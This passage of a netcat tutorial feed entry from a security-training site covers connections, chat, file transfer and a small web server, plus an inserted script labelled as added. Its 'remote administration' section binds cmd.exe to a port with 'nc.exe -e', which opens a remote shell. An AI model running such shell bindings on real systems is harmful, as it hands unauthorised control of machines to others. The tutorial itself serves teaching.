<p><img decoding="async" class="alignnone wp-image-25320 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/5.png" alt="" width="608" height="90" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/5.png 608w, https://www.armourinfosec.com/wp-content/uploads/2020/01/5-300x44.png 300w" sizes="(max-width: 608px) 100vw, 608px" /></p>
<h5><strong>Connecting to a Server :</strong></h5>
<p>Here, we will connect to an FTP server with the IP address 192.168.1.200. Netcat connects to the server on a specific port where a particular service is running; in our case the port is 21, i.e. FTP.</p>
<pre class="theme:familiar lang:sh decode:true ">nc 192.168.1.200 21</pre>
<p><img decoding="async" class="alignnone wp-image-25321" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/6.png" alt="" width="600" height="223" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/6.png 776w, https://www.armourinfosec.com/wp-content/uploads/2020/01/6-300x111.png 300w, https://www.armourinfosec.com/wp-content/uploads/2020/01/6-768x285.png 768w" sizes="(max-width: 600px) 100vw, 600px" /></p>
<h5><strong>Command Line Chat Server :</strong></h5>
<p>Netcat can also be used for communication between two users. We need to establish a connection before chatting, and for this we need two devices: one plays the role of the initiator and the other is the listener that waits for the conversation to start. Once the connection is established, communication can be done from both ends.</p>
<p><strong>User 1</strong><br />
<strong>OS</strong>: Kali Linux<br />
<strong>IP Address</strong>: 192.168.1.100<br />
<strong>Role</strong>: Listener</p>
<p><strong>User 2</strong><br />
<strong>OS</strong>: CentOS<br />
<strong>IP Address</strong>: 192.168.1.200<br />
<strong>Role</strong>: Initiator</p>
<p>On <strong>User 1</strong>, we will start a listener on port <strong>4455</strong> using the options <strong>-l</strong> for listen, <strong>-v</strong> for verbose mode and <strong>-p</strong> for the port.</p>
<pre class="theme:familiar lang:sh decode:true ">nc -lvp 4455</pre>
<p><img decoding="async" class="alignnone wp-image-25323" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/7.png" alt="" width="605" height="113" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/7.png 696w, https://www.armourinfosec.com/wp-content/uploads/2020/01/7-300x56.png 300w" sizes="(max-width: 605px) 100vw, 605px" /></p>
<p>On <strong>User 2</strong>, we will create the initiator by providing the IP address of the listener followed by the listener port.</p>
<pre class="theme:familiar lang:sh decode:true ">nc -v 192.168.1.100 4455</pre>
<p><img decoding="async" class="alignnone wp-image-25324 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/8.png" alt="" width="490" height="107" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/8.png 490w, https://www.armourinfosec.com/wp-content/uploads/2020/01/8-300x66.png 300w" sizes="(max-width: 490px) 100vw, 490px" /></p>
<h5><strong>Transferring Files with Netcat :</strong></h5>
<p>Netcat can also be used to transfer files, both text and binary, from one computer to another. Here we will create a scenario where we transfer a file from a Kali system to a Windows system.</p>
<p>On the <strong>Windows system</strong>, we will set up a netcat listener on port <strong>4455</strong> and redirect any incoming input into a file called <strong>output.txt</strong>.</p>
<pre class="theme:familiar lang:sh decode:true ">nc.exe -nlvp 4455 &gt; output.txt</pre>
<p><img decoding="async" class="alignnone wp-image-25326" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/9.png" alt="" width="605" height="63" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/9.png 570w, https://www.armourinfosec.com/wp-content/uploads/2020/01/9-300x31.png 300w" sizes="(max-width: 605px) 100vw, 605px" /></p>
<p>On the <strong>Linux system</strong>, we will push the file to the Windows system through port <strong>4455</strong>:</p>
<pre class="theme:familiar lang:sh decode:true ">nc -v 192.168.1.200 4455  &lt; demo.txt</pre>
<p><img decoding="async" class="alignnone wp-image-25327" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/10.png" alt="" width="605" height="68" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/10.png 517w, https://www.armourinfosec.com/wp-content/uploads/2020/01/10-300x34.png 300w" sizes="(max-width: 605px) 100vw, 605px" /></p>
<p>The connection is received by netcat on the <strong>Windows system</strong> as shown below:</p>
<p><img decoding="async" class="alignnone wp-image-25328" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/11.png" alt="" width="605" height="103" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/11.png 760w, https://www.armourinfosec.com/wp-content/uploads/2020/01/11-300x51.png 300w" sizes="(max-width: 605px) 100vw, 605px" /></p>
<h5><strong>Randomize Port :</strong></h5>
<p>If we do not want to choose a port ourselves for a Netcat connection, we can use the special <strong>-r</strong> parameter, which gives us a randomized local port.</p>
<pre class="theme:familiar lang:sh decode:true ">nc -lv -r</pre>
<p><img decoding="async" class="alignnone wp-image-25329 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/12.png" alt="" width="344" height="50" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/12.png 344w, https://www.armourinfosec.com/wp-content/uploads/2020/01/12-300x44.png 300w" sizes="(max-width: 344px) 100vw, 344px" /></p>
<h5><strong>Simple Web Server with Netcat :</strong></h5>
<p>Netcat can be used as a simple web server. A web server is actually very simple if there are no special configuration requirements: it only sends HTML pages over the HTTP protocol.</p>
<pre class="theme:familiar lang:sh decode:true "># the empty line (\r\n\r\n) ends the HTTP headers; without it the first line of index.html is read as a header
while : ; do ( echo -ne "HTTP/1.1 200 OK\r\n\r\n" ; cat index.html; ) | nc -l -p 8080 ; done</pre>
<p><img decoding="async" class="alignnone wp-image-25330" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/13-1024x187.png" alt="" width="605" height="111" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/13-1024x187.png 1024w, https://www.armourinfosec.com/wp-content/uploads/2020/01/13-300x55.png 300w, https://www.armourinfosec.com/wp-content/uploads/2020/01/13-768x141.png 768w, https://www.armourinfosec.com/wp-content/uploads/2020/01/13.png 1213w" sizes="(max-width: 605px) 100vw, 605px" /></p>
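The one-liner above sends only a status line and no Content-Length, so a browser cannot tell where the page ends and has to wait for netcat to close the connection. As an added example that is not part of the original post, the script below builds a well-formed HTTP/1.1 response (status line, Content-Type, Content-Length, the blank line that terminates the headers, then the body) and serves it with the same <code>nc -l -p</code> loop; the function names, the file name index.html and port 8080 are assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): a minimal static web server on
# top of netcat that sends a complete HTTP/1.1 response. The function names,
# the file name index.html and the port 8080 are assumptions.

# Print a full HTTP response for the given file on stdout: status line,
# Content-Type, Content-Length, a blank line, then the body. HTTP requires
# every header line, and the blank line that ends the headers, to be
# terminated by CRLF, which is why printf uses \r\n throughout.
http_response() {
    file="$1"
    if [ ! -r "$file" ]; then
        # constructed fallback page for a missing or unreadable file
        body="<html><body><h1>404 Not Found</h1></body></html>"
        printf 'HTTP/1.1 404 Not Found\r\n'
    else
        body=$(cat "$file")
        printf 'HTTP/1.1 200 OK\r\n'
    fi
    # wc -c counts bytes, which is what Content-Length must carry
    length=$(printf '%s' "$body" | wc -c | tr -d ' ')
    printf 'Content-Type: text/html; charset=utf-8\r\n'
    printf 'Content-Length: %s\r\n' "$length"
    printf 'Connection: close\r\n'
    printf '\r\n'
    printf '%s' "$body"
}

# Serve one file forever, one connection at a time, using the same
# traditional-netcat listener form as the post (nc -l -p PORT).
serve_page() {
    file="$1"
    port="${2:-8080}"
    while : ; do
        http_response "$file" | nc -l -p "$port"
    done
}

# Usage: serve_page index.html 8080
```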
<h5><strong>Remote Administration with Netcat :</strong></h5>
<p>One of the most useful features of netcat is its ability to do command redirection. Netcat can take an executable file and redirect its input, output, and error messages to a TCP/UDP port rather than the default console.<br />
To further explain this, consider the cmd.exe executable. By redirecting its stdin, stdout, and stderr to the network, we can bind cmd.exe to a local port. Anyone connecting to this port will be presented with a command prompt belonging to this computer. To further drive this home, consider the following scenario, involving <strong>Windows</strong> and <strong>Kali</strong>.</p>
<p>First, we will start a listener on the <strong>Windows system</strong> for the remote connection, which will be made from <strong>Kali</strong>.</p>
<pre class="theme:familiar lang:sh decode:true ">nc.exe -nlvp 4455 -e cmd.exe</pre>
<p><img decoding="async" class="alignnone wp-image-25331 size-full" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/14.png" alt="" width="506" height="51" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/14.png 506w, https://www.armourinfosec.com/wp-content/uploads/2020/01/14-300x30.png 300w" sizes="(max-width: 506px) 100vw, 506px" /></p>
<p>On <strong>Kali</strong>, when we connect to the listener port on <strong>Windows</strong>, we get its command shell.</p>
<pre class="theme:familiar lang:sh decode:true ">nc -v 192.168.1.200 4455</pre>
<p><img decoding="async" class="alignnone wp-image-25332" src="https://www.armourinfosec.com/wp-content/uploads/2020/01/15.png" alt="" width="605" height="135" srcset="https://www.armourinfosec.com/wp-content/uploads/2020/01/15.png 572w, https://www.armourinfosec.com/wp-content/uploads/2020/01/15-300x67.png 300w" sizes="(max-width: 605px) 100vw, 605px" /></p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.armourinfosec.com/hacking-with-netcat-a-comprehensive-guide/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
